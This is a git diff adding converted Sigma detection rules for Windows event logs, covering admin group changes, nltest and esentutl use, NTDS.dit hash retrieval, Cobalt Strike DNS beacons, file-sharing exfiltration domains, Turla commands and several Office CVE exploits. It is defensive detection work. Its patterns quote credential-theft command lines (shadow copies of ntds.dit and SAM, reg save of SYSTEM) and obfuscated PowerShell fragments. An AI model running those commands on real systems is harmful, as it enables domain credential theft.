deprecated +description: | + Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges. + Sigma detects + Event ID 4728 indicates a "Member is added to a Security Group". + Event ID 4729 indicates a "Member is removed from a Security enabled-group". + Event ID 4730 indicates a "Security Group is deleted". + The case is not applicable for Unix OS. + Supported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019, Windows Server 2000, Windows 2003 and XP. +references: + - https://www.cisecurity.org/controls/cis-controls-list/ + - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf + - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf + - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728 + - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729 + - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730 + - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633 + - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632 + - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634 +author: Alexandr Yampolskyi, SOC Prime +date: 2019/03/26 +modified: 2023/04/26 +# tags: + # - CSC4 + # - CSC4.8 + # - NIST CSF 1.1 PR.AC-4 + # - NIST CSF 1.1 PR.AT-2 + # - NIST CSF 1.1 PR.MA-2 + # - NIST CSF 1.1 PR.PT-3 + # - ISO 27002-2013 A.9.1.1 + # - ISO 27002-2013 A.9.2.2 + # - ISO 27002-2013 A.9.2.3 + # - ISO 27002-2013 A.9.2.4 + # - ISO 27002-2013 A.9.2.5 + # - ISO 27002-2013 A.9.2.6 + # - ISO 27002-2013 A.9.3.1 + # - ISO 27002-2013 A.9.4.1 + # - ISO 27002-2013 A.9.4.2 + # - ISO 27002-2013 A.9.4.3 + # - ISO 27002-2013 A.9.4.4 + # - PCI DSS 3.2 2.1 + # - PCI DSS 3.2 7.1 + # - PCI DSS 3.2 7.2 + # - PCI DSS 3.2 7.3 + # - PCI DSS 3.2 8.1 + # - PCI DSS 3.2 8.2 + # - PCI DSS 3.2 8.3 + # - PCI DSS 3.2 8.7 +logsource: + product: windows + service: security +detection: + security: + Channel: Security + selection: + EventID: + - 4728 # A member was added to a security-enabled global group + - 4729 # A member was removed from a security-enabled global group + - 4730 # A security-enabled global group was deleted + - 633 # Security Enabled Global Group Member Removed + - 632 # Security Enabled Global Group Member Added + - 634 # Security Enabled Global Group Deleted + condition: security and selection +falsepositives: + - Unknown +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/win_security_lolbas_execution_of_nltest.yml b/tools/sigmac/converted_rules/builtin/deprecated/win_security_lolbas_execution_of_nltest.yml new file mode 100644 index 000000000..bfd8d86ac --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/win_security_lolbas_execution_of_nltest.yml @@ -0,0 +1,34 @@ +title: Correct Execution of Nltest.exe +id: eeb66bbb-3dde-4582-815a-584aee9fe6d1 +status: deprecated +description: The attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions. +references: + - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm + - https://attack.mitre.org/software/S0359/ +author: Arun Chauhan +date: 2021/10/04 +modified: 2023/02/02 +tags: + - attack.discovery + - attack.t1482 # enumerate trusted domains by using commands such as nltest /domain_trusts + - attack.t1018 # enumerate remote domain controllers using options such as /dclist and /dsgetdc + - attack.t1016 # enumerate the parent domain of a local machine using /parentdomain +logsource: + product: windows + service: security +detection: + security: + Channel: Security + selection: + EventID: 4689 + ProcessName|endswith: nltest.exe + Status: '0x0' + condition: security and selection +fields: + - SubjectUserName + - SubjectDomainName +falsepositives: + - Red team activity + - Rare legitimate use by an administrator +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/win_susp_esentutl_activity.yml b/tools/sigmac/converted_rules/builtin/deprecated/win_susp_esentutl_activity.yml new file mode 100644 index 000000000..7008e5553 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/win_susp_esentutl_activity.yml @@ -0,0 +1,34 @@ +title: Suspicious Esentutl Use +id: 56a8189f-11b2-48c8-8ca7-c54b03c2fbf7 +status: deprecated +description: Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance. +author: Florian Roth (Nextron Systems) +date: 2020/05/23 +modified: 2022/04/11 +references: + - https://lolbas-project.github.io/ + - https://twitter.com/chadtilbury/status/1264226341408452610 +tags: + - attack.defense_evasion + - attack.execution + - attack.s0404 + - attack.t1218 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains|all: + - ' /vss ' + - ' /y ' + condition: process_creation and selection +fields: + - CommandLine + - ParentCommandLine +falsepositives: + - Administrative activity +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/win_susp_vssadmin_ntds_activity.yml b/tools/sigmac/converted_rules/builtin/deprecated/win_susp_vssadmin_ntds_activity.yml new file mode 100644 index 000000000..554165915 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/win_susp_vssadmin_ntds_activity.yml @@ -0,0 +1,42 @@ +title: Activity Related to NTDS.dit Domain Hash Retrieval +id: b932b60f-fdda-4d53-8eda-a170c1d97bbd +status: deprecated +description: Detects suspicious commands that could be related to activity that uses volume shadow copy to steal and retrieve hashes from the NTDS.dit file remotely +author: Florian Roth (Nextron Systems), Michael Haag +date: 2019/01/16 +modified: 2022/04/11 +references: + - https://www.swordshield.com/2015/07/getting-hashes-from-ntds-dit-file/ + - https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/ + - https://www.trustwave.com/Resources/SpiderLabs-Blog/Tutorial-for-NTDS-goodness-(VSSADMIN,-WMIS,-NTDS-dit,-SYSTEM)/ + - https://securingtomorrow.mcafee.com/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/ + - https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ +tags: + - attack.credential_access + - attack.t1003 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine: + - vssadmin.exe Delete Shadows + - 'vssadmin create shadow /for=C:' + - copy \\?\GLOBALROOT\Device\\*\windows\ntds\ntds.dit + - copy \\?\GLOBALROOT\Device\\*\config\SAM + - 'vssadmin delete shadows /for=C:' + - 'reg SAVE HKLM\SYSTEM ' + - esentutl.exe /y /vss *\ntds.dit* + - esentutl.exe /y /vss *\SAM + - esentutl.exe /y /vss *\SYSTEM + condition: process_creation and selection +fields: + - CommandLine + - ParentCommandLine +falsepositives: + - Administrative activity +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/win_system_service_install_susp_double_ampersand.yml b/tools/sigmac/converted_rules/builtin/deprecated/win_system_service_install_susp_double_ampersand.yml new file mode 100644 index 000000000..343dee973 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/win_system_service_install_susp_double_ampersand.yml @@ -0,0 +1,27 @@ +title: New Service Uses Double Ampersand in Path +id: ca83e9f3-657a-45d0-88d6-c1ac280caf53 +status: deprecated +description: Detects a service installation that uses a suspicious double ampersand used in the image path value +references: + - Internal Research +author: Florian Roth (Nextron Systems) +date: 2022/07/05 +modified: 2023/11/15 +tags: + - attack.defense_evasion + - attack.t1027 +logsource: + product: windows + service: system +detection: + system: + Channel: System + selection: + Provider_Name: Service Control Manager + EventID: 7045 + ImagePath|contains: '&&' + condition: system and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml b/tools/sigmac/converted_rules/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml new file mode 100644 index 000000000..d12cf61cc --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml @@ -0,0 +1,25 @@ +title: Loading Diagcab Package From Remote Path +id: 50cb47b8-2c33-4b23-a2e9-4600657d9746 +status: test +description: Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability +references: + - https://twitter.com/nas_bench/status/1539679555908141061 + - https://twitter.com/j00sean/status/1537750439701225472 +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/08/14 +tags: + - attack.execution +logsource: + product: windows + service: diagnosis-scripted +detection: + diagnosis_scripted: + Channel: Microsoft-Windows-Diagnosis-Scripted/Operational + selection: + EventID: 101 + PackagePath|contains: \\\\ # Example would be: \\webdav-test.herokuapp.com@ssl\DavWWWRoot\package + condition: diagnosis_scripted and selection +falsepositives: + - Legitimate package hosted on a known and authorized remote location +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/dns_client/win_dns_client__mal_cobaltstrike.yml b/tools/sigmac/converted_rules/builtin/dns_client/win_dns_client__mal_cobaltstrike.yml new file mode 100644 index 000000000..90aac3c83 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/dns_client/win_dns_client__mal_cobaltstrike.yml @@ -0,0 +1,35 @@ +title: Suspicious Cobalt Strike DNS Beaconing - DNS Client +id: 0d18728b-f5bf-4381-9dcf-915539fff6c2 +related: + - id: f356a9c4-effd-4608-bbf8-408afd5cd006 + type: similar +status: test +description: Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons +references: + - https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns + - https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/01/16 +tags: + - attack.command_and_control + - attack.t1071.004 +logsource: + product: windows + service: dns-client + definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.' +detection: + dns_client: + Channel: Microsoft-Windows-DNS Client Events/Operational + selection_eid: + EventID: 3008 + selection_query_1: + QueryName|startswith: + - aaa.stage. + - post.1 + selection_query_2: + QueryName|contains: .stage.123456. + condition: dns_client and (selection_eid and 1 of selection_query_*) +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_anonymfiles_com.yml b/tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_anonymfiles_com.yml new file mode 100644 index 000000000..abddacb4d --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_anonymfiles_com.yml @@ -0,0 +1,29 @@ +title: DNS Query for Anonfiles.com Domain - DNS Client +id: 29f171d7-aa47-42c7-9c7b-3c87938164d9 +related: + - id: 065cceea-77ec-4030-9052-fc0affea7110 + type: similar +status: test +description: Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes +references: + - https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/01/16 +tags: + - attack.exfiltration + - attack.t1567.002 +logsource: + product: windows + service: dns-client + definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.' +detection: + dns_client: + Channel: Microsoft-Windows-DNS Client Events/Operational + selection: + EventID: 3008 + QueryName|contains: .anonfiles.com + condition: dns_client and selection +falsepositives: + - Rare legitimate access to anonfiles.com +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_mega_nz.yml b/tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_mega_nz.yml new file mode 100644 index 000000000..dc63fcf36 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_mega_nz.yml @@ -0,0 +1,29 @@ +title: DNS Query To MEGA Hosting Website - DNS Client +id: 66474410-b883-415f-9f8d-75345a0a66a6 +related: + - id: 613c03ba-0779-4a53-8a1f-47f914a4ded3 + type: similar +status: test +description: Detects DNS queries for subdomains related to MEGA sharing website +references: + - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/01/16 +tags: + - attack.exfiltration + - attack.t1567.002 +logsource: + product: windows + service: dns-client + definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.' +detection: + dns_client: + Channel: Microsoft-Windows-DNS Client Events/Operational + selection: + EventID: 3008 + QueryName|contains: userstorage.mega.co.nz + condition: dns_client and selection +falsepositives: + - Legitimate DNS queries and usage of Mega +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_tor_onion.yml b/tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_tor_onion.yml new file mode 100644 index 000000000..651ec29be --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_tor_onion.yml @@ -0,0 +1,29 @@ +title: Query Tor Onion Address - DNS Client +id: 8384bd26-bde6-4da9-8e5d-4174a7a47ca2 +related: + - id: b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544 + type: similar +status: test +description: Detects DNS resolution of an .onion address related to Tor routing networks +references: + - https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/02/20 +tags: + - attack.command_and_control + - attack.t1090.003 +logsource: + product: windows + service: dns-client + definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.' +detection: + dns_client: + Channel: Microsoft-Windows-DNS Client Events/Operational + selection: + EventID: 3008 + QueryName|contains: .onion + condition: dns_client and selection +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_ufile_io.yml b/tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_ufile_io.yml new file mode 100644 index 000000000..26f404283 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_ufile_io.yml @@ -0,0 +1,30 @@ +title: DNS Query To Ufile.io - DNS Client +id: 090ffaad-c01a-4879-850c-6d57da98452d +related: + - id: 1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b + type: similar +status: experimental +description: Detects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration +references: + - https://thedfirreport.com/2021/12/13/diavol-ransomware/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/01/16 +modified: 2023/09/18 +tags: + - attack.exfiltration + - attack.t1567.002 +logsource: + product: windows + service: dns-client + definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.' +detection: + dns_client: + Channel: Microsoft-Windows-DNS Client Events/Operational + selection: + EventID: 3008 + QueryName|contains: ufile.io + condition: dns_client and selection +falsepositives: + - DNS queries for "ufile" are not malicious by nature necessarily. Investigate the source to determine the necessary actions to take +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/dns_server/win_dns_server_failed_dns_zone_transfer.yml b/tools/sigmac/converted_rules/builtin/dns_server/win_dns_server_failed_dns_zone_transfer.yml new file mode 100644 index 000000000..ffca67d76 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/dns_server/win_dns_server_failed_dns_zone_transfer.yml @@ -0,0 +1,24 @@ +title: Failed DNS Zone Transfer +id: 6d444368-6da1-43fe-b2fc-44202430480e +status: experimental +description: Detects when a DNS zone transfer failed. +references: + - https://kb.eventtracker.com/evtpass/evtpages/EventId_6004_Microsoft-Windows-DNS-Server-Service_65410.asp +author: Zach Mathis +date: 2023/05/24 +tags: + - attack.reconnaissance + - attack.t1590.002 +logsource: + product: windows + service: dns-server +detection: + dns_server: + Channel: DNS Server + selection: + EventID: 6004 # The DNS server received a zone transfer request from %1 for a non-existent or non-authoritative zone %2. + condition: dns_server and selection +falsepositives: + - Unlikely +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/dns_server/win_dns_server_susp_server_level_plugin_dll.yml b/tools/sigmac/converted_rules/builtin/dns_server/win_dns_server_susp_server_level_plugin_dll.yml new file mode 100644 index 000000000..98dab8c3f --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/dns_server/win_dns_server_susp_server_level_plugin_dll.yml @@ -0,0 +1,35 @@ +title: DNS Server Error Failed Loading the ServerLevelPluginDLL +id: cbe51394-cd93-4473-b555-edf0144952d9 +related: + - id: e61e8a88-59a9-451c-874e-70fcc9740d67 + type: derived + - id: f63b56ee-3f79-4b8a-97fb-5c48007e8573 + type: derived +status: test +description: Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded +references: + - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 + - https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx + - https://twitter.com/gentilkiwi/status/861641945944391680 +author: Florian Roth (Nextron Systems) +date: 2017/05/08 +modified: 2023/02/05 +tags: + - attack.defense_evasion + - attack.t1574.002 +logsource: + product: windows + service: dns-server +detection: + dns_server: + Channel: DNS Server + selection: + EventID: + - 150 + - 770 + - 771 + condition: dns_server and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/driverframeworks/win_usb_device_plugged.yml b/tools/sigmac/converted_rules/builtin/driverframeworks/win_usb_device_plugged.yml new file mode 100644 index 000000000..2bdcf202b --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/driverframeworks/win_usb_device_plugged.yml @@ -0,0 +1,30 @@ +title: USB Device Plugged +id: 1a4bd6e3-4c6e-405d-a9a3-53a116e341d4 +status: test +description: Detects plugged/unplugged USB devices +references: + - https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/ + - https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/ +author: Florian Roth (Nextron Systems) +date: 2017/11/09 +modified: 2021/11/30 +tags: + - attack.initial_access + - attack.t1200 +logsource: + product: windows + service: driver-framework + definition: Requires enabling and collection of the Microsoft-Windows-DriverFrameworks-UserMode/Operational eventlog +detection: + driver_framework: + Channel: Microsoft-Windows-DriverFrameworks-UserMode/Operational + selection: + EventID: + - 2003 # Loading drivers + - 2100 # Pnp or power management + - 2102 # Pnp or power management + condition: driver_framework and selection +falsepositives: + - Legitimate administrative activity +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2014/TA/Axiom/proc_creation_win_apt_zxshell.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2014/TA/Axiom/proc_creation_win_apt_zxshell.yml new file mode 100644 index 000000000..7f11bd5e4 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2014/TA/Axiom/proc_creation_win_apt_zxshell.yml @@ -0,0 +1,38 @@ +title: ZxShell Malware +id: f0b70adb-0075-43b0-9745-e82a1c608fcc +status: test +description: Detects a ZxShell start by the called and well-known function name +references: + - https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100 + - https://pub-7cb8ac806c1b4c4383e585c474a24719.r2.dev/116309e7121bc8b0e66e4166c06f7b818e1d3629.pdf +author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro +date: 2017/07/20 +modified: 2021/11/27 +tags: + - attack.execution + - attack.t1059.003 + - attack.defense_evasion + - attack.t1218.011 + - attack.s0412 + - attack.g0001 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: + - zxFunction + - RemoteDiskXXXXX + NewProcessName|endswith: \rundll32.exe + condition: process_creation and selection +fields: + - CommandLine + - ParentCommandLine +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_commands_critical.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_commands_critical.yml new file mode 100644 index 000000000..a5372e7bc --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_commands_critical.yml @@ -0,0 +1,36 @@ +title: Turla Group Lateral Movement +id: c601f20d-570a-4cde-a7d6-e17f99cb8e7f +status: test +description: Detects automated lateral movement by Turla group +references: + - https://securelist.com/the-epic-turla-operation/65545/ +author: Markus Neis +date: 2017/11/07 +modified: 2022/10/09 +tags: + - attack.g0010 + - attack.execution + - attack.t1059 + - attack.lateral_movement + - attack.t1021.002 + - attack.discovery + - attack.t1083 + - attack.t1135 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine: + - net use \\\\%DomainController%\C$ "P@ssw0rd" * + - dir c:\\*.doc* /s + - dir %TEMP%\\*.exe + condition: process_creation and selection +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_comrat_may20.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_comrat_may20.yml new file mode 100644 index 000000000..2bf684be1 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_comrat_may20.yml @@ -0,0 +1,37 @@ +title: Turla Group Commands May 2020 +id: 9e2e51c5-c699-4794-ba5a-29f5da40ac0c +status: test +description: Detects commands used by Turla group as reported by ESET in May 2020 +references: + - https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf +author: Florian Roth (Nextron Systems) +date: 2020/05/26 +modified: 2021/11/27 +tags: + - attack.g0010 + - attack.execution + - attack.t1059.001 + - attack.t1053.005 + - attack.t1027 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_cli_1: + CommandLine|contains: + - tracert -h 10 yahoo.com + - .WSqmCons))|iex; + - Fr`omBa`se6`4Str`ing + selection_cli_2: + CommandLine|contains|all: + - net use https://docs.live.net + - '@aol.co.uk' + condition: process_creation and (1 of selection_*) +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2015/Exploits/CVE-2015-1641/proc_creation_win_exploit_cve_2015_1641.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2015/Exploits/CVE-2015-1641/proc_creation_win_exploit_cve_2015_1641.yml new file mode 100644 index 000000000..fe8565135 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2015/Exploits/CVE-2015-1641/proc_creation_win_exploit_cve_2015_1641.yml @@ -0,0 +1,30 @@ +title: Exploit for CVE-2015-1641 +id: 7993792c-5ce2-4475-a3db-a3a5539827ef +status: stable +description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641 +references: + - https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/ + - https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100 +author: Florian Roth (Nextron Systems) +date: 2018/02/22 +modified: 2021/11/27 +tags: + - attack.defense_evasion + - attack.t1036.005 + - cve.2015.1641 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + ParentProcessName|endswith: \WINWORD.EXE + NewProcessName|endswith: \MicroScMgmt.exe + condition: process_creation and selection +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Exploits/CVE-2017-0261/proc_creation_win_exploit_cve_2017_0261.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Exploits/CVE-2017-0261/proc_creation_win_exploit_cve_2017_0261.yml new file mode 100644 index 000000000..e13c6ca95 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Exploits/CVE-2017-0261/proc_creation_win_exploit_cve_2017_0261.yml @@ -0,0 +1,32 @@ +title: Exploit for CVE-2017-0261 +id: 864403a1-36c9-40a2-a982-4c9a45f7d833 +status: test +description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262 +references: + - https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html +author: Florian Roth (Nextron Systems) +date: 2018/02/22 +modified: 2021/11/27 +tags: + - attack.execution + - attack.t1203 + - attack.t1204.002 + - attack.initial_access + - attack.t1566.001 + - cve.2017.0261 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + ParentProcessName|endswith: \WINWORD.EXE + NewProcessName|contains: \FLTLDR.exe + condition: process_creation and selection +falsepositives: + - Several false positives identified, check for suspicious file names or locations (e.g. Temp folders) +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Exploits/CVE-2017-11882/proc_creation_win_exploit_cve_2017_11882.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Exploits/CVE-2017-11882/proc_creation_win_exploit_cve_2017_11882.yml new file mode 100644 index 000000000..1ed94956f --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Exploits/CVE-2017-11882/proc_creation_win_exploit_cve_2017_11882.yml @@ -0,0 +1,34 @@ +title: Droppers Exploiting CVE-2017-11882 +id: 678eb5f4-8597-4be6-8be7-905e4234b53a +status: stable +description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe +references: + - https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100 + - https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw +author: Florian Roth (Nextron Systems) +date: 2017/11/23 +modified: 2021/11/27 +tags: + - attack.execution + - attack.t1203 + - attack.t1204.002 + - attack.initial_access + - attack.t1566.001 + - cve.2017.11882 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + ParentProcessName|endswith: \EQNEDT32.EXE + condition: process_creation and selection +fields: + - CommandLine +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Exploits/CVE-2017-8759/proc_creation_win_exploit_cve_2017_8759.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Exploits/CVE-2017-8759/proc_creation_win_exploit_cve_2017_8759.yml new file mode 100644 index 000000000..6f92a3317 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Exploits/CVE-2017-8759/proc_creation_win_exploit_cve_2017_8759.yml @@ -0,0 +1,33 @@ +title: Exploit for CVE-2017-8759 +id: fdd84c68-a1f6-47c9-9477-920584f94905 +status: test +description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759 +references: + - https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100 + - https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100 +author: Florian Roth (Nextron Systems) +date: 2017/09/15 +modified: 2021/11/27 +tags: + - attack.execution + - attack.t1203 + - attack.t1204.002 + - attack.initial_access + - attack.t1566.001 + - cve.2017.8759 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + ParentProcessName|endswith: \WINWORD.EXE + NewProcessName|endswith: \csc.exe + condition: process_creation and selection +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/Adwind-RAT/proc_creation_win_malware_adwind.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/Adwind-RAT/proc_creation_win_malware_adwind.yml new file mode 100644 index 000000000..a6014b1e8 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/Adwind-RAT/proc_creation_win_malware_adwind.yml @@ -0,0 +1,34 @@ +title: Adwind RAT / JRAT +id: 1fac1481-2dbc-48b2-9096-753c49b4ec71 +status: test +description: Detects javaw.exe in AppData folder as used by Adwind / JRAT +references: + - https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100 + - https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf +author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community +date: 2017/11/10 +modified: 2022/10/09 +tags: + - attack.execution + - attack.t1059.005 + - attack.t1059.007 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + - CommandLine|contains|all: + - \AppData\Roaming\Oracle + - \java + - '.exe ' + - CommandLine|contains|all: + - cscript.exe + - Retrive + - '.vbs ' + condition: process_creation and selection +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/Fireball/proc_creation_win_malware_fireball.yml 